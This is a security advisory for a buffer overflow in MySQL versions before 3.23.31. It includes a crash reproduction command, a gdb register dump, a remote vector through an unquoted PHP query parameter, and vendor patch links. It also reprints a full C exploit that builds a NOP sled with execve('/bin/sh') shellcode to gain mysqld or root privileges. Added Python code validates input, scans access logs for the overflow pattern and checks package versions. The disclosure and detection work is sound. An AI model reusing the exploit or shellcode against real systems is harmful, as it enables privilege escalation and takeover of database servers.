COMMAND
MySQL
SYSTEMS AFFECTED
MySQL prior to 3.23.31
PROBLEM
All versions of MySQL < 3.23.31 have a buffer overflow which crashes
the server and which seems to be exploitable (i.e. 0x41414141 in eip).
An attacker could gain mysqld privileges (gaining access to all
the databases). You need a valid login/password to exploit this.
Well, not always: in a default installation one can exploit it like
this: mysql -ustring -e<query> , with no need for a valid database,
login, nor password. The real danger of this flaw is the
possibility of its being exploited remotely. If there is a simple
PHP script (for example) that has an SQL query like "$SQL=select *
from table where index=$index" (provided that $index isn't
quoted), one can exploit it using something like:
script.php?index=a.(buffer).b
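The remote vector described above comes down to an unquoted, unvalidated query parameter being interpolated into SQL. As an added example (not part of the advisory or of any project it names), the Python below shows the allowlist check a script should apply to $index before the value touches the query, and a detector that applies the same check to web-server access-log lines to flag requests carrying the a.<long identifier>.b pattern. The parameter name "index" and the Common Log Format layout are assumptions, the log lines are constructed, and the 64-character threshold is MySQL's limit on table and column identifier length.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL limits table and column identifiers to 64 characters, so a
# well-formed identifier in a query string never needs to be longer.
MYSQL_MAX_IDENTIFIER = 64

INTEGER_RE = re.compile(r"[0-9]{1,10}")


def is_valid_index(raw):
    """True only for a plain decimal integer: the allowlist that a script
    interpolating "$index" into SQL without quotes should enforce."""
    return INTEGER_RE.fullmatch(raw) is not None


def validate_index(raw):
    """Hardened replacement for using "$index" as-is: reject anything that is
    not a decimal integer before it is placed into the query, so a value such
    as 'a.AAAA....b' from the advisory never reaches the server."""
    if not is_valid_index(raw):
        raise ValueError("index must be a decimal integer, got %r" % raw[:24])
    return int(raw)


def suspicious_params(url, int_params=("index",)):
    """Return (parameter, reason) pairs for query parameters that should have
    been integers but are not, and for any value longer than MySQL's
    identifier limit (the signature of an overflow attempt)."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in int_params and not is_valid_index(value):
            findings.append((name, "non-integer value"))
        if len(value) > MYSQL_MAX_IDENTIFIER:
            findings.append((name, "value length %d exceeds %d"
                             % (len(value), MYSQL_MAX_IDENTIFIER)))
    return findings


# Common Log Format, with the request line split into method, URL and protocol
# (assumed layout; adjust the pattern for other web-server log formats).
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Run suspicious_params over each request; returns one tuple per flagged
    request: (client ip, path without query string, findings)."""
    hits = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if not m:
            continue
        findings = suspicious_params(m.group("url"))
        if findings:
            hits.append((m.group("ip"), m.group("url").split("?", 1)[0], findings))
    return hits


# Constructed sample log lines (not from the advisory): a normal request and
# one carrying the a.<130 x 'A'>.b identifier shown in the crash transcript.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2001:07:10:12 +0000] "GET /script.php?index=42 HTTP/1.0" 200 512',
    '10.0.0.9 - - [12/Jan/2001:07:10:54 +0000] "GET /script.php?index=a.'
    + "A" * 130 + '.b HTTP/1.0" 500 0',
]

if __name__ == "__main__":
    for ip, path, findings in scan_access_log(SAMPLE_LOG):
        print(ip, path, findings)
```

A hit from the scanner is worth correlating with the database host: each time the daemon is killed and brought back, the safe_mysqld wrapper writes "Segmentation fault" and "mysqld restarted on ..." lines to the error log, exactly as in the transcript below, so a burst of those lines around the flagged request confirms the attempt reached the server.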
The first public report was made by Joao Gouveia aka Tharbad.
Here are some tests he made on 3.22.27 x86 (also tested on
v3.22.32).
On one terminal:
spike:/var/mysql # /sbin/init.d/mysql start
Starting service MySQL.
Starting mysqld daemon with databases from /var/mysql
done
spike:/var/mysql #
On the other terminal:
jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
Enter password:
(hanged..^C)
On the first terminal we have:
spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault nohup
$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-locking "$@" >>$err_log 2>&1>
Number of processes running now: 0
mysqld restarted on Fri Jan 12 07:10:54 WET 2001
mysqld daemon ended
gdb shows the following:
(gdb) run
Starting program: /usr/sbin/mysqld
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/mysqld: ready for connections
[New Thread 16916]
[Switching to Thread 16916]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax 0x1 1
ecx 0x68 104
edx 0x8166947 135686471
ebx 0x41414141 1094795585
esp 0xbf5ff408 0xbf5ff408
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb)
Luis Miguel Ferreira Silva wrote the following exploit:
/*
Linux MySQL Exploit by Luis Miguel Silva [aka wC]
lms@ispgaya.pt
19/01/y2k+1
Compile:
gcc MySQLXploit.c -o MySQLX
Run with:
You can specify the offset for the exploit passing it as the 1st arg...
Example: ./MySQLX 0 ---> this is the default offset :]
*/
#include <stdio.h>
#include <stdlib.h>   /* malloc, exit, atoi, system */
#include <string.h>   /* strlen */

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 130
#define NOP 0x90

// Our EVIL code...
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

// Returns the current stack pointer (x86/gcc: the value left in %eax
// is what the caller reads as the return value).
unsigned long get_sp(void) {
  __asm__("movl %esp,%eax");
}

// Where it all happens...
int main(int argc, char *argv[])
{
  char *buffer, *ptr, tmp[1500];
  long *addr_ptr, addr;
  int i, bsize = DEFAULT_BUFFER_SIZE, offset = DEFAULT_OFFSET;

  printf("\nMySQL [all versions < 3.23.31] Local Exploit by lms@ispgaya.pt\n\n");
  if (argc == 2)
    offset = atoi(argv[1]);
  else
    printf("Happy thoughts: Did you know you can pass an offset as argv[1]? :]\n");

  printf("Trying to allocate memory for buffer (%d bytes)...", bsize);
  if (!(buffer = malloc(bsize))) {
    printf("ERROR!\n");
    printf("Couldn't allocate memory...\n");
    printf("Exiting...\n");
    exit(0);
  }
  printf("SUCCESS!\n");

  addr = get_sp() - offset;
  printf("Using address : 0x%lx\n", addr);
  printf("Offset : %d\n", offset);
  printf("Buffer Size : %d\n", bsize);

  // Fill the whole buffer with the guessed return address ...
  ptr = buffer;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i += 4) *(addr_ptr++) = addr;
  // ... overwrite the first half with a NOP sled ...
  for (i = 0; i < bsize / 2; i++) buffer[i] = NOP;
  // ... and put the shellcode in the middle of the buffer.
  ptr = buffer + ((bsize / 2) - (strlen(shellcode) / 2));
  for (i = 0; i < (int) strlen(shellcode); i++) *(ptr++) = shellcode[i];
  buffer[bsize - 1] = '\0';

  // Pass the buffer to the mysql client as the identifier in "select a.<buffer>.b".
  snprintf(tmp, sizeof(tmp), "mysql -p -e 'select a.'%s'.b'", buffer);
  printf("Oh k...i have the evil'buffer right here :P\n");
  printf("So...[if all went well], prepare to be r00t...\n");
  system(tmp);
  return 0;
}
SOLUTION
Upgrade to 3.23.31.
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/MySQL-bench-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/MySQL-3.23.32-2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-client-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-static-3.23.32-2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-bench-3.23.32-2cl.i386.rpm
For RedHat:
ftp://updates.redhat.com/7.0/SRPMS/mysql-3.23.32-1.7.src.rpm
ftp://updates.redhat.com/7.0/SRPMS/mysqlclient9-3.23.22-3.src.rpm
ftp://updates.redhat.com/7.0/alpha/mysql-3.23.32-1.7.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/mysql-devel-3.23.32-1.7.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/mysql-server-3.23.32-1.7.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/mysqlclient9-3.23.22-3.alpha.rpm
ftp://updates.redhat.com/7.0/i386/mysql-3.23.32-1.7.i386.rpm
ftp://updates.redhat.com/7.0/i386/mysql-devel-3.23.32-1.7.i386.rpm
ftp://updates.redhat.com/7.0/i386/mysql-server-3.23.32-1.7.i386.rpm
ftp://updates.redhat.com/7.0/i386/mysqlclient9-3.23.22-3.i386.rpm
For Linux-Mandrake:
Linux-Mandrake 7.1:
7.1/RPMS/MySQL-3.22.32-5.1mdk.i586.rpm
7.1/RPMS/MySQL-bench-3.22.32-5.1mdk.i586.rpm
7.1/RPMS/MySQL-client-3.22.32-5.1mdk.i586.rpm
7.1/RPMS/MySQL-devel-3.22.32-5.1mdk.i586.rpm
7.1/RPMS/MySQL-shared-libs-3.22.32-5.1mdk.i586.rpm
7.1/SRPMS/MySQL-3.22.32-5.1mdk.src.rpm
Linux-Mandrake 7.2:
7.2/RPMS/MySQL-3.23.31-1.1mdk.i586.rpm
7.2/RPMS/MySQL-bench-3.23.31-1.1mdk.i586.rpm
7.2/RPMS/MySQL-client-3.23.31-1.1mdk.i586.rpm
7.2/RPMS/MySQL-devel-3.23.31-1.1mdk.i586.rpm
7.2/RPMS/MySQL-shared-3.23.31-1.1mdk.i586.rpm
7.2/SRPMS/MySQL-3.23.31-1.1mdk.src.rpm
7.2/RPMS/mod_php-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-dba_gdbm_db2-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-devel-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-gd-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-imap-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-ldap-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-manual-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-mysql-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-pgsql-4.0.4pl1-1.2mdk.i586.rpm
7.2/RPMS/php-readline-4.0.4pl1-1.2mdk.i586.rpm
7.2/SRPMS/php-4.0.4pl1-1.2mdk.src.rpm
Corporate Server 1.0.1:
1.0.1/RPMS/MySQL-3.22.32-5.1mdk.i586.rpm
1.0.1/RPMS/MySQL-bench-3.22.32-5.1mdk.i586.rpm
1.0.1/RPMS/MySQL-client-3.22.32-5.1mdk.i586.rpm
1.0.1/RPMS/MySQL-devel-3.22.32-5.1mdk.i586.rpm
1.0.1/RPMS/MySQL-shared-libs-3.22.32-5.1mdk.i586.rpm
1.0.1/SRPMS/MySQL-3.22.32-5.1mdk.src.rpm
For Debian:
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.diff.gz
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.dsc
http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-client_3.22.32-4_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-server_3.22.32-4_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-client_3.22.32-4_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-server_3.22.32-4_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-client_3.22.32-4_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-server_3.22.32-4_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-client_3.22.32-4_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-server_3.22.32-4_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/php4-mysql_4.0.3pl1-0potato1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/mysql-server_3.22.32-4_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/mysql-server_3.22.32-4_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-all/mysql-doc_3.22.32-4_all.deb
For Caldera Systems:
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
RPMS/mysql-3.22.32-3S.i386.rpm
RPMS/mysql-bench-3.22.32-3S.i386.rpm
RPMS/mysql-client-3.22.32-3S.i386.rpm
RPMS/mysql-devel-3.22.32-3S.i386.rpm
SRPMS/mysql-3.22.32-3S.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
RPMS/mysql-3.22.32-3.i386.rpm
RPMS/mysql-bench-3.22.32-3.i386.rpm
RPMS/mysql-client-3.22.32-3.i386.rpm
RPMS/mysql-devel-3.22.32-3.i386.rpm
SRPMS/mysql-3.22.32-3.src.rpm
For FreeBSD:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/databases/mysql-3.23.32.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/databases/mysql-3.23.32.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/databases/mysql-3.23.32.tgz
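The package versions in the SOLUTION section show why a bare version comparison is not enough: Debian, Mandrake 7.1 and Caldera ship fixed packages that still report upstream 3.22.32, because the fix was backported. As an added example, not part of the advisory, the Python below first compares an upstream version against 3.23.31 and then checks a vendor package release against the fixed releases listed above. The sample banner string is constructed (real banner wording varies by build); the vendor-to-release table is taken from this page only, so any release not in it is treated conservatively by the upstream comparison alone.

```python
import re

# Upstream fix version from the advisory: anything older is affected.
FIXED_UPSTREAM = (3, 23, 31)

# Vendor package releases the advisory lists as fixed. Several vendors kept
# the 3.22.32 upstream version and backported the fix, so the upstream
# number alone cannot tell a patched package from a vulnerable one.
FIXED_VENDOR_RELEASES = {
    "conectiva": {"3.23.32-2cl"},
    "redhat": {"3.23.32-1.7"},
    "mandrake": {"3.22.32-5.1mdk", "3.23.31-1.1mdk"},
    "debian": {"3.22.32-4"},
    "caldera": {"3.22.32-3S", "3.22.32-3"},
}

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """First x.y.z triple found in text (a `mysqld --version` banner, an rpm
    or deb version string); None if there is none."""
    m = VERSION_RE.search(text)
    return tuple(int(part) for part in m.groups()) if m else None


def upstream_vulnerable(version_text):
    """True when the upstream version predates 3.23.31."""
    version = parse_version(version_text)
    if version is None:
        raise ValueError("no x.y.z version found in %r" % version_text)
    return version < FIXED_UPSTREAM


def package_status(vendor, package_release):
    """'fixed' for a release the advisory names; otherwise fall back to the
    upstream comparison, so an unknown release with an old upstream version
    is reported as 'vulnerable' (no backport is assumed)."""
    if package_release in FIXED_VENDOR_RELEASES.get(vendor.lower(), set()):
        return "fixed"
    return "vulnerable" if upstream_vulnerable(package_release) else "not affected"


# Constructed sample banner; the exact wording of a real banner differs by build.
SAMPLE_BANNER = "/usr/sbin/mysqld  Ver 3.22.32 for pc-linux-gnu on i686"

if __name__ == "__main__":
    print(SAMPLE_BANNER, "->",
          "vulnerable" if upstream_vulnerable(SAMPLE_BANNER) else "not affected")
    for vendor, release in [("debian", "3.22.32-4"), ("debian", "3.22.32-3"),
                            ("redhat", "3.23.32-1.7")]:
        print(vendor, release, "->", package_status(vendor, release))
```

When the vendor is unknown, or a package release is not in the table, the result is driven only by the upstream number, which is the right failure mode for a check like this: it reports a possibly patched 3.22.x package as vulnerable rather than silently passing it.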